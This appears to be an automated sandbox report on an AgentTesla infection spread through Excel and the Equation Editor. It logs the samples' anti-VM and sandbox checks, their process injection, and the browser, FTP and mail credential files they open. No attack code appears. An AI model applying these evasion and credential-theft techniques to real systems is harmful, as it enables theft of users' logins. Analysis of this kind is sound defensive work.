                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: joewealth28743.exe PID: 1980, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Nwefile.exe PID: 2664, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Nwefile.exe PID: 2768, type: MEMORY
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: joewealth28743.exe, 00000003.00000002.2142270666.00000000023D4000.00000004.00000001.sdmp, Nwefile.exe, 00000005.00000002.2214264595.00000000020F6000.00000004.00000001.sdmp, Nwefile.exe, 00000007.00000002.2237024296.0000000002376000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                      Source: joewealth28743.exe, 00000003.00000002.2142270666.00000000023D4000.00000004.00000001.sdmp, Nwefile.exe, 00000005.00000002.2214264595.00000000020F6000.00000004.00000001.sdmp, Nwefile.exe, 00000007.00000002.2237024296.0000000002376000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeWindow / User API: threadDelayed 514
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeWindow / User API: threadDelayed 9221
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeWindow / User API: threadDelayed 404
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeWindow / User API: threadDelayed 2686
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeWindow / User API: threadDelayed 9526
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2596Thread sleep time: -240000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exe TID: 912Thread sleep time: -31500s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exe TID: 3008Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exe TID: 2180Thread sleep time: -300000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exe TID: 3044Thread sleep time: -4611686018427385s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exe TID: 3044Thread sleep time: -120000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exe TID: 3060Thread sleep count: 514 > 30
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exe TID: 3060Thread sleep count: 9221 > 30
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exe TID: 3044Thread sleep count: 106 > 30
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe TID: 1800Thread sleep time: -31500s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe TID: 2004Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe TID: 2596Thread sleep time: -300000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe TID: 1944Thread sleep time: -4611686018427385s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe TID: 1944Thread sleep time: -90000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe TID: 2924Thread sleep count: 404 > 30
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe TID: 2952Thread sleep count: 2686 > 30
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe TID: 2996Thread sleep time: -31500s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe TID: 2648Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe TID: 3052Thread sleep time: -300000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe TID: 3020Thread sleep time: -7378697629483816s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe TID: 3020Thread sleep time: -120000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe TID: 3064Thread sleep count: 9526 > 30
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe TID: 3064Thread sleep count: 221 > 30
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe TID: 3020Thread sleep count: 100 > 30
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeThread delayed: delay time: 31500
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeThread delayed: delay time: 30000
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeThread delayed: delay time: 31500
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeThread delayed: delay time: 30000
                      Source: Nwefile.exe, 00000007.00000002.2237024296.0000000002376000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
                      Source: Nwefile.exe, 00000007.00000002.2237024296.0000000002376000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: Nwefile.exe, 00000007.00000002.2237024296.0000000002376000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: Nwefile.exe, 00000007.00000002.2237024296.0000000002376000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                      Source: Nwefile.exe, 00000007.00000002.2237024296.0000000002376000.00000004.00000001.sdmpBinary or memory string: VMWARE
                      Source: Nwefile.exe, 00000007.00000002.2237024296.0000000002376000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: Nwefile.exe, 00000007.00000002.2237024296.0000000002376000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                      Source: Nwefile.exe, 00000007.00000002.2237024296.0000000002376000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                      Source: Nwefile.exe, 00000007.00000002.2237024296.0000000002376000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      Injects a PE file into foreign processes
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeMemory written: C:\Users\user\AppData\Roaming\joewealth28743.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeMemory written: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe base: 400000 value starts with: 4D5A
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\joewealth28743.exe C:\Users\user\AppData\Roaming\joewealth28743.exe
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess created: C:\Users\user\AppData\Roaming\joewealth28743.exe {path}
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess created: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe {path}
                      Source: joewealth28743.exe, 00000004.00000002.2352649918.0000000000FB0000.00000002.00000001.sdmp, Nwefile.exe, 00000008.00000002.2351879422.0000000000C30000.00000002.00000001.sdmpBinary or memory string: Program Manager
                      Source: joewealth28743.exe, 00000004.00000002.2352649918.0000000000FB0000.00000002.00000001.sdmp, Nwefile.exe, 00000008.00000002.2351879422.0000000000C30000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                      Source: joewealth28743.exe, 00000004.00000002.2352649918.0000000000FB0000.00000002.00000001.sdmp, Nwefile.exe, 00000008.00000002.2351879422.0000000000C30000.00000002.00000001.sdmpBinary or memory string: !Progman
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeQueries volume information: C:\Users\user\AppData\Roaming\joewealth28743.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeQueries volume information: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      Yara detected AgentTesla
                      Source: Yara matchFile source: 00000006.00000002.2236823411.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2239066475.00000000035BB000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2143882626.000000000361B000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2216387056.000000000333B000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2351324007.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2351274027.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 8.2.Nwefile.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.Nwefile.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.Nwefile.exe.33d6ac0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.Nwefile.exe.33d6ac0.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.joewealth28743.exe.36b6ac0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.joewealth28743.exe.36b6ac0.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.joewealth28743.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.Nwefile.exe.3656ac0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.Nwefile.exe.3656ac0.5.unpack, type: UNPACKEDPE
                      Yara detected AgentTesla
                      Source: Yara matchFile source: 00000006.00000002.2236823411.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2237439431.00000000021A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2239066475.00000000035BB000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2143882626.000000000361B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2216387056.000000000333B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2351324007.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2352252684.0000000002371000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2351274027.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2352749717.00000000023B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2353787746.000000000278B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2353745503.0000000002723000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: joewealth28743.exe PID: 1980, type: MEMORY
Source: Yara match | File source: Process Memory Space: joewealth28743.exe PID: 2988, type: MEMORY
Source: Yara match | File source: Process Memory Space: Nwefile.exe PID: 1888, type: MEMORY
Source: Yara match | File source: Process Memory Space: Nwefile.exe PID: 2792, type: MEMORY
Source: Yara match | File source: Process Memory Space: Nwefile.exe PID: 2664, type: MEMORY
Source: Yara match | File source: Process Memory Space: Nwefile.exe PID: 2768, type: MEMORY
Source: Yara match | File source: 8.2.Nwefile.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.Nwefile.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.Nwefile.exe.33d6ac0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.Nwefile.exe.33d6ac0.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.joewealth28743.exe.36b6ac0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.joewealth28743.exe.36b6ac0.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.joewealth28743.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.Nwefile.exe.3656ac0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.Nwefile.exe.3656ac0.5.unpack, type: UNPACKEDPE
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Roaming\joewealth28743.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\joewealth28743.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Roaming\joewealth28743.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
Source: C:\Users\user\AppData\Roaming\joewealth28743.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Tries to steal Mail credentials (via file access)
Source: C:\Users\user\AppData\Roaming\joewealth28743.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\joewealth28743.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: Yara match | File source: 00000006.00000002.2237439431.00000000021A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2352252684.0000000002371000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2352749717.00000000023B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2353787746.000000000278B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: joewealth28743.exe PID: 2988, type: MEMORY
Source: Yara match | File source: Process Memory Space: Nwefile.exe PID: 1888, type: MEMORY
Source: Yara match | File source: Process Memory Space: Nwefile.exe PID: 2792, type: MEMORY

                      Remote Access Functionality:

                      barindex
Yara detected AgentTesla
Source: Yara match | File source: 00000006.00000002.2236823411.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2239066475.00000000035BB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2143882626.000000000361B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2216387056.000000000333B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2351324007.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2351274027.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 8.2.Nwefile.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.Nwefile.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.Nwefile.exe.33d6ac0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.Nwefile.exe.33d6ac0.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.joewealth28743.exe.36b6ac0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.joewealth28743.exe.36b6ac0.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.joewealth28743.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.Nwefile.exe.3656ac0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.Nwefile.exe.3656ac0.5.unpack, type: UNPACKEDPE
Yara detected AgentTesla
Source: Yara match | File source: 00000006.00000002.2236823411.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2237439431.00000000021A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2239066475.00000000035BB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2143882626.000000000361B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2216387056.000000000333B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2351324007.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2352252684.0000000002371000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2351274027.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2352749717.00000000023B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2353787746.000000000278B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2353745503.0000000002723000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: joewealth28743.exe PID: 1980, type: MEMORY
Source: Yara match | File source: Process Memory Space: joewealth28743.exe PID: 2988, type: MEMORY
Source: Yara match | File source: Process Memory Space: Nwefile.exe PID: 1888, type: MEMORY
